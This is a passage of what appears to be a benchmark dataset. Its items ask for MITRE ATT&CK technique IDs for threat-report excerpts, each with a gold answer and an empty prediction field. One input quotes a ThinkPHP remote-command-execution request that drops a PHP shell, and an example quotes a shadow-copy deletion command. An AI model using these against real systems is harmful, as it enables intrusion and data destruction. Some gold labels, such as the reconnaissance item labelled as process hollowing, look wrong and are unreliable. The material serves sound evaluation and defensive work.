data.\n\t - T1027: Obfuscated Files or Information\n\t - T1027.009: Obfuscated Files or Information - Embedded Payloads\n", "input": "\nAn interesting note on these payloads is that all the Delphi payloads delivered in this campaign were packed with UPX, while none of the other payloads were packed", "gold": "- T1027.002: Obfuscated Files or Information - Software Packing", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: AT&T Alien Labs has discovered new malicious files distributed by the threat actor TeamTNT. The use of open-source tools like Lazagne allows TeamTNT to stay below the radar for a while, making it more difficult for anti-virus companies to detect\n\t - T1082: System Information Discovery\n\t - T1049: System Network Connections Discovery\n- Text: TSCookie has the ability to identify the IP of the infected host.\n\t - T1016: System Network Configuration Discovery\n- Text: The actors\u00a0leveraged\u00a0publicly available utilities Adfind, BLOODHOUND, SHARPHOUND, and KERBRUTE on\u00a0victim networks to collect Active Directory information and credentials. WMIC commands\u00a0have been used\u00a0to perform host reconnaissance, including listing installed software, listing running processes, and identifying operating system and system architecture. The actors have used a batch script to ping all servers identified during Active Directory enumeration and output the results to\u00a0res.txt. The actors used the\u00a0Nltest\u00a0command to list domain controllers\n\t - T1018: Remote System Discovery\n", "input": "\nmay use netstat -ano to display active network connections.", "gold": "- T1049: System Network Connections Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can execute a payload on a remote host with PowerShell. This technique does write any data to disk.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: Turla surveys a system upon check-in to discover Group Policy details using the \"gpresult\" command.\n\t - T1615: Group Policy Discovery\n- Text: To install this module, drop the entire PowerSploit folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable\n\t - T1574.007: Hijack Execution Flow - Path Interception by PATH Environment Variable\n", "input": "\nhas used PowerShell Empire.", "gold": "- T1059.001: Command and Scripting Interpreter - PowerShell", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Nerex creates a Registry subkey that registers a new service.\n\t - T1112: Modify Registry\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: Proxysvc registers itself as a service on the victim\u2019s machine to run as a standalone process.\n\t - T1569.002: System Services - Service Execution\n- Text: The victims Data from Cadelle\u2019s C&C servers shows that a large number of Backdoor.Cadelspy infections affected individual users of Iranian internet service providers (ISPs) and hosting services\n\t - T1543: Create or Modify System Process\n\t - T1543.003: Create or Modify System Process - Windows Service\n", "input": "\ncan install as a Windows service for persistence.", "gold": "- T1543.003: Create or Modify System Process - Windows Service", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Both variants build their API imports dynamically using GetProcAddress, including wtsapi32.dll for gathering user and domain names for any active remote sessions - Both variants contain a variety of functionalities based on command IDs issued by the control servers - Common capabilities of both malware: Listing files in directory Creating arbitrary processes Writing data received from control servers to files on disk Gathering information for all drives Gathering process times for all processes Sending the contents of a specific file to the control server Wiping and deleting files on disk Setting the current working directory for the implant Sending disk space information to the control server - Listing files in directory - Creating arbitrary processes - Writing data received from control servers to files on disk - Gathering information for all drives - Gathering process times for all processes - Sending the contents of a specific file to the control server - Wiping and deleting files on disk - Setting the current working directory for the implant - Sending disk space information to the control server - Both variants use a batch file mechanism to delete their binaries from the system - Both variants run commands on the system, log output to a temporary file, and send the contents of the file to their control servers\n\t - T1082: System Information Discovery\n\t - T1057: Process Discovery\n\t - T1083: File and Directory Discovery\n- Text: As seen in the above image, the Bazar backdoor can handle quite a few commands. This next section focuses on case 1, which retrieves various pieces of additional information on the infected machine\n\t - T1005: Data from Local System\n- Text: Sowbug extracted Word documents from a file server on a victim network.\n\t - T1039: Data from Network Shared Drive\n", "input": "\nidentified and extracted all Word documents on a server by using a command containing * .doc and *.docx. The actors also searched for documents based on a specific date range and attempted to identify all installed software on a victim.", "gold": "- T1083: File and Directory Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: OSX_OCEANLOTUS.D has a command to delete a file from the system. OSX_OCEANLOTUS.D deletes the app bundle and dropper after execution.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: It should be noted that the Win32/KillDisk.NBB variant used against media companies is more focused on destroying various types of files and documents. It has a long list of file extensions that it tries to overwrite and delete. The complete list contains more than 4000 file extensions\n\t - T1485: Data Destruction\n- Text: Delete the shadow volumes with vssadmin (\u201cvssadmin Delete Shadows /all /quiet\u201d). - Resize the shadow storage for all units starting from C to H units\u2019 letters (hardcoded letters) to avoid the shadow volumes being made again. Using bcedit program to disable the recovery options in the boot of the machine and set to ignore any failure in the boot warning the user\n\t - T1490: Inhibit System Recovery\n", "input": "\nhas a tool that can delete files.", "gold": "- T1070.004: Indicator Removal - File Deletion", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: After this, the Carbanak backdoor can then be used to log keystrokes and capture screenshots, steal and delete cookies, inject malicious code on sites, and monitor various traffic. For lateral movement, the malware abuses remote and system administration tools.\n\t - T1539: Steal Web Session Cookie\n\t - T1113: Screen Capture\n\t - T1550.004: Use Alternate Authentication Material - Web Session Cookie\n\t - T1020.001: Automated Exfiltration - Traffic Duplication\n\t - T1056.003: Input Capture - Web Portal Capture\n- Text: GALLIUM used Web shells to persist in victim environments and assist in execution and exfiltration.\n\t - T1505.003: Server Software Component - Web Shell\n- Text: IceApple is an IIS post-exploitation framework, consisting of 18 modules that provide several functionalities.\n\t - T1505.004: Server Software Component - IIS Components\n", "input": "\nDecrypted OwaAuth log file format", "gold": "- T1140: Deobfuscate/Decode Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ccf32 can delete files and folders from compromised machines.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: First, several of these commands contain checks to determine the environment in order to use appropriate paths or commands. The \u2018tasklist\u2019 command will use a WMI query or the \u201cps\u201d command, which allows Kazuar to obtain running processes from both Windows and Unix systems. Also, Kazuar\u2019s \u2018cmd\u2019 command will run commands using \u201ccmd.exe\u201d for Windows systems and \u201c/bin/bash\u201d for Unix systems. These two commands provide evidence that the authors of Kazuar intended to use this malware as a cross-platform tool to target both Windows and Unix systems\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n- Text: has used the Windows command shell to execute commands.\n\t - T1059: Command and Scripting Interpreter\n", "input": "\nLANS Deletes the file created by the LAN command to reverse the effect", "gold": "- T1070.004: Indicator Removal - File Deletion", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This data theft module appears to have been compiled in May 2015 and is designed to watch removable drives and collect files from them, depending on a set of rules defined by the attackers. The stolen data is copied into a hidden directory as \u201c%MYPICTURES%\\%volume serial number%\u201c, from where it can be exfiltrated by the attackers using one of the AZZY implants\n\t - T1074.001: Data Staged - Local Data Staging\n\t - T1025: Data from Removable Media\n- Text: automatically collects files from the local system and removable drives based on a predefined list of file extensions on a regular timeframe.\n\t - T1119: Automated Collection\n- Text: Calisto uses a hidden directory named .calisto to store data from the victim\u2019s machine before exfiltration.\n\t - T1074.001: Data Staged - Local Data Staging\n\t - T1564.001: Hide Artifacts - Hidden Files and Directories\n", "input": "\nidentifies files with certain extensions from USB devices, then copies them to a predefined directory.", "gold": "- T1083: File and Directory Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lucifer is quite powerful in its capabilities. Not only is it capable of dropping XMRig for cryptojacking Monero, it\u2019s also capable of command and control (C2) operation and self-propagation through the exploitation of multiple vulnerabilities and credential brute-forcing. Additionally, it drops and runs EternalBlue, EternalRomance, and DoublePulsar backdoor against vulnerable targets for intranet infections\n\t - T1210: Exploitation of Remote Services\n- Text: When Xbash finds a destination has Hadoop, Redis or ActiveMQ running, it will also attempt to exploit the service for self-propagation. Three known vulnerabilities are targeted\n\t - T1203: Exploitation for Client Execution\n- Text: has a command to upload a file to the victim machine.\n\t - T1105: Ingress Tool Transfer\n", "input": "\nhas used remote code execution to download subsequent payloads.", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The malware initializes by gathering system and malware filename information and creates a mutex to make sure only one instance of the Trojan executes on the system at a time. Kazuar generates its mutex by using a process that begins with obtaining the MD5 hash of a string \u201c[username]=>singleton-instance-mutex\u201d. The Trojan then encrypts this MD5 hash using an XOR algorithm and the serial number of the storage volume. Kazuar uses the resulting ciphertext to generate a GUID that it appends to the string \u201cGlobal\\\\\u201d to create the mutex\n\t - T1087.001: Account Discovery - Local Account\n\t - T1082: System Information Discovery\n- Text: There are likely differences in the Skeleton Key malware documented by Dell SecureWorks and the Mimikatz skeleton key functionality. If all the DCs don\u2019t have skeleton key configured, the master password won\u2019t work when the client authenticates to a DC without skeleton key. Scenario: Either the attacker exploits MS14-068 or has the KRBTGT NTLM password hash and uses it to generate a Kerberos Golden Ticket to impersonate a valid Domain Admin account. Domain Controller Security Events When Implanting the Mimikatz Skeleton Key: When implanting the skeleton key remotely using Mimikatz the following events are logged on the Domain Controller. Authenticating with the Mimikatz Skeleton Key: Testing user password and user account with skeleton key password. Note that both passwords are accepted \u2013 the valid user password and the skeleton key master password. Testing Domain Admin account with password & skeleton key password. Note that both passwords are accepted \u2013 the valid user password and the skeleton key master password. Skeleton Key Mitigation: - Protect domain-level admin (DLA) accounts (Domain Admin, Administrators, etc) which reduces the risk of attackers gaining access to these credentials. Don\u2019t let DLA accounts logon to systems at a different security level from Domain Controllers\n\t - T1098: Account Manipulation\n- Text: During Operation Wocao, threat actors used the command `net localgroup administrators` to list all administrators part of a local group.\n\t - T1069.001: Permission Groups Discovery - Local Groups\n", "input": "\nhas the capability to execute the command net localgroup administrators.", "gold": "- T1069: Permission Groups Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Persistence is maintained through a Run registry key\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: appears to have functionality to modify remote Registry information.\n\t - T1112: Modify Registry\n- Text: Dtrack\u2019s RAT makes a persistent target file with auto execution on the host start.\n\t - T1547: Boot or Logon Autostart Execution\n", "input": "\nachieves persistence by using various Registry Run keys.", "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Skidmap has monitored critical processes to ensure resiliency.\n\t - T1057: Process Discovery\n- Text: Chinese state-sponsored cyber actors have been observed using Base-64 encoded commands, including ping, net group, and net user to enumerate target network information.\n\t - T1018: Remote System Discovery\n- Text: PlugX has a module for enumerating TCP and UDP network connections and associated processes using the \"netstat\" command.\n\t - T1049: System Network Connections Discovery\n", "input": "\nThey utilised Windows commands in order to enumerate and conduct reconnaissance activities such as tasklist.exe, ping.exe, netstat.exe, net.exe, systeminfo.exe, ipconfig.exe and bcp.exe", "gold": "- T1055.012: Process Injection - Process Hollowing\n- T1036: Masquerading", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During Operation Dust Storm, the threat actors exploited Adobe Flash vulnerability CVE-2011-0611, Microsoft Windows Help vulnerability CVE-2010-1885, and several Internet Explorer vulnerabilities, including CVE-2011-1255, CVE-2012-1889, and CVE-2014-0322.\n\t - T1203: Exploitation for Client Execution\n- Text: APT39 has used SQL injection for initial compromise.\n\t - T1190: Exploit Public-Facing Application\n- Text: JHUHUGIT has exploited CVE-2015-1701 and CVE-2015-2387 to escalate privileges.\n\t - T1068: Exploitation for Privilege Escalation\n", "input": "\nFigure 2: Zyklon attack flow Infection Techniques CVE-2017-8759 This vulnerability was discovered by FireEye in September 2017, and it is a vulnerability we have observed being exploited in the wild", "gold": "- T1203: Exploitation for Client Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Dragonfly has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems.\n\t - T1187: Forced Authentication\n- Text: binds and listens on port 1058.\n\t - T1571: Non-Standard Port\n- Text: attempted to contact the C2 server over TCP using port 80.\n\t - T1043: Commonly Used Port\n", "input": "\ncommunicates over port 80 for C2.", "gold": "- T1043: Commonly Used Port", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: They attempted to extract all Word documents stored on a file server belonging to this division by bundling them into a RAR archive by running the following command\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: Threat Group-3390 has used RAR to compress, encrypt, and password-protect files prior to exfiltration.\n\t - T1560.002: Archive Collected Data - Archive via Library\n- Text: To complete its mission, APT39 typically archives stolen data with compression tools such as WinRAR or 7-Zip\n\t - T1560: Archive Collected Data\n", "input": "\nhas created password-protected RAR, WinImage, and zip archives to be exfiltrated.", "gold": "- T1560: Archive Collected Data\n- T1486: Data Encrypted for Impact", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lastly, the attackers used Comodo code-signing certificates several times during the course of the campaign. Many of the above TTPs are not unique to ITG08, but collectively, and with the use of More_eggs, strengthen the link to this group\n\t - T1047: Windows Management Instrumentation\n- Text: Heyoka Backdoor can enumerate drives on a compromised host.\n\t - T1082: System Information Discovery\n- Text: The most notable change to this variant of Zebrocy, other than the programming language used, is the way the tool gathers the system information and running processes\n\t - T1057: Process Discovery\n", "input": "\nInstead of using systeminfo and tasklist commands, the C# variant of Zebrocy uses WMI queries to gather this information", "gold": "- T1047: Windows Management Instrumentation", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In the past we have seen others techniques that used Bitcoin blockchain to hide their C&C server IP address, but in this blog we will share an analysis of the new technique\n\t - T1568: Dynamic Resolution\n- Text: Numbered Panda has a long list of high-profile victims and is known by a number of names including: DYNCALC, IXESHE, JOY RAT, APT-12, etc. Numbered Panda has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments. Numbered Panda has targeted organizations in time-sensitive operations such as the Fukushima Reactor Incident of 2011, likely filling intelligence gaps in the ground cleanup/mitigation operations. One of the most interesting techniques that Numbered Panda likes to use is to dynamically calculate the Command and Control (C2) port by resolving a DNS. The malware will typically use two DNS names for communication: one is used for command and control; the other is used with an algorithm to calculate the port to communicate to. There are several variations of the algorithm used to calculate the C2 port, but one of the most common is to multiply the first two octets of the IP address and add the third octet to that value. This is typically represented as: (A * B) + C \u2013 common values might be 200.2.43.X, which would result in communication on port 443. Numbered Panda will frequently use blogs or WordPress in the c2 infrastructure, which helps to make the network traffic look more legitimate. CrowdStrike has observed Numbered Panda targeting high-tech, defense contractors, media organizations, and western governments\n\t - T1568.003: Dynamic Resolution - DNS Calculation\n- Text: Pisloader uses DNS as its C2 protocol.\n\t - T1071.004: Application Layer Protocol - DNS\n", "input": "\n^testmode Runs the test function to determine which DNS query types can successfully communicate with the C2 ^showconfig Creates a pipe delimited (\u201c|\u201d) string that contains the sample\u2019s settings, including the list of C2 domains and available DNS query types", "gold": "- T1071: Application Layer Protocol\n- T1008: Fallback Channels", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kimsuky has exploited various vulnerabilities for initial access, including Microsoft Exchange vulnerability CVE-2020-0688.\n\t - T1190: Exploit Public-Facing Application\n- Text: creates a backdoor through which remote attackers can start a remote shell.\n\t - T1059: Command and Scripting Interpreter\n- Text: ASPXSpy is a Web shell. The ASPXTool version used by Threat Group-3390 has been deployed to accessible servers running Internet Information Services (IIS).\n\t - T1505.003: Server Software Component - Web Shell\n", "input": "\nThe exploitation is issued in three steps: Exploiting CVE-2018-20062 for uploading a PHP shell Using a GET request, a remote command execution vulnerability in ThinkPHP (CVE-2018-20062) is sent to the targeted server, as shown below: s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>index.php This shell executes commands sent via the \u201cmodule\u201d parameter in a query", "gold": "- T1059: Command and Scripting Interpreter\n- T1203: Exploitation for Client Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SECOND STAGE JAVASCRIPT INTO POWERSHELL: The second stage JavaScript creates a PowerShell file with the same name in the same directory\n\t - T1064: Scripting\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n- Text: Mosquito stores configuration values under the Registry key \"HKCU\\Software\\Microsoft\\[dllname]\" and modifies Registry keys under \"HKCR\\CLSID\\...\\InprocServer32\"with a path to the launcher.\n\t - T1112: Modify Registry\n- Text: Bazar can use Winlogon Helper DLL to establish persistence.\n\t - T1547.004: Boot or Logon Autostart Execution - Winlogon Helper DLL\n", "input": "\nadds a sub-key under several Registry run keys.", "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Taidoor can use a stream cipher to decrypt stings used by the malware.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: hides any strings related to its own indicators of compromise.\n\t - T1027: Obfuscated Files or Information\n\t - T1027: Obfuscated Files or Information\n- Text: Invoke-PSImage can be used to embed payload data within a new image file.\n\t - T1027.009: Obfuscated Files or Information - Embedded Payloads\n", "input": "\nThe 2.0 versions require a dropper to decipher and launch the AES encrypted QUASARRAT payload", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: LightNeuron collects Exchange emails matching rules specified in its configuration.\n\t - T1114.002: Email Collection - Remote Email Collection\n- Text: QakBot can target and steal locally stored emails to support thread hijacking phishing campaigns.\n\t - T1114.001: Email Collection - Local Email Collection\n- Text: searches through Outlook files and directories (e.g., inbox, sent, templates, drafts, archives, etc.).\n\t - T1114: Email Collection\n", "input": "\nuses two utilities, GETMAIL and MAPIGET, to steal email. GETMAIL extracts emails from archived Outlook .pst files, and MAPIGET steals email still on Exchange servers that has not yet been archived.", "gold": "- T1114: Email Collection", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The TajMahal framework is an intriguing discovery that\u2019s of great interest, not least for its high level of technical sophistication, which is beyond any doubt. For example, it has its own indexer, emergency C2s, is capable of stealing specific files from external drives when they become available again, etc\n\t - T1083: File and Directory Discovery\n\t - T1119: Automated Collection\n\t - T1041: Exfiltration Over C2 Channel\n- Text: Chinese state-sponsored cyber actors have been observed using a non-standard SSH port to establish covert communication channels with VPS infrastructure.\n\t - T1571: Non-Standard Port\n- Text: Wizard Spider has used HTTP for network communications.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n", "input": "\nuses HTTP over port 443 for command and control.", "gold": "- T1043: Commonly Used Port", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ServHelper contains modules that will use schtasks to carry out malicious operations.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: On balance,\u00a0the fall campaigns diverged from\u00a0Bulgarian themed\u00a0NetWire\u00a0campaigns in the\u00a0early\u00a0summer in\u00a0scope\u00a0and scale. These campaigns distributed\u00a0NetWire\u00a0variants which used Bulgarian email lures, leveraged geofencing, and downloading EXEs through\u00a0certutils. The\u00a0NetWire\u00a0malware has been around since at least 2002 and has been consistently\u00a0in use by various actors across\u00a0the threat\u00a0landscape. This\u00a0analysis shows groupings of similar\u00a0campaigns distributing\u00a0NetWire\u00a0based on message attributes, email lures\u00a0and\u00a0language, Office document metadata, VBA Macro code, and malware configuration\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: They use At.exe to schedule tasks to run self-extracting RAR archives, which install either HttpBrowser or PlugX\n\t - T1053: Scheduled Task/Job\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n", "input": "\nFigure 4: Execution Workflow Section of v.vbs After successful execution of the steps mentioned in the Execution Workflow section, the Task Scheduler will launch GoogleUpdateschecker.vbs every minute, which in turn executes the dUpdateCheckers.ps1 and hUpdateCheckers.ps1 scripts", "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task\n- T1106: Native API\n- T1064: Scripting", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Another indicator of a Qakbot infection is HTTPS traffic to cdn.speedof[.]me. The domain speedof[.]me is used by a legitimate Internet speed test service. Although this is not malicious traffic, we frequently see traffic to 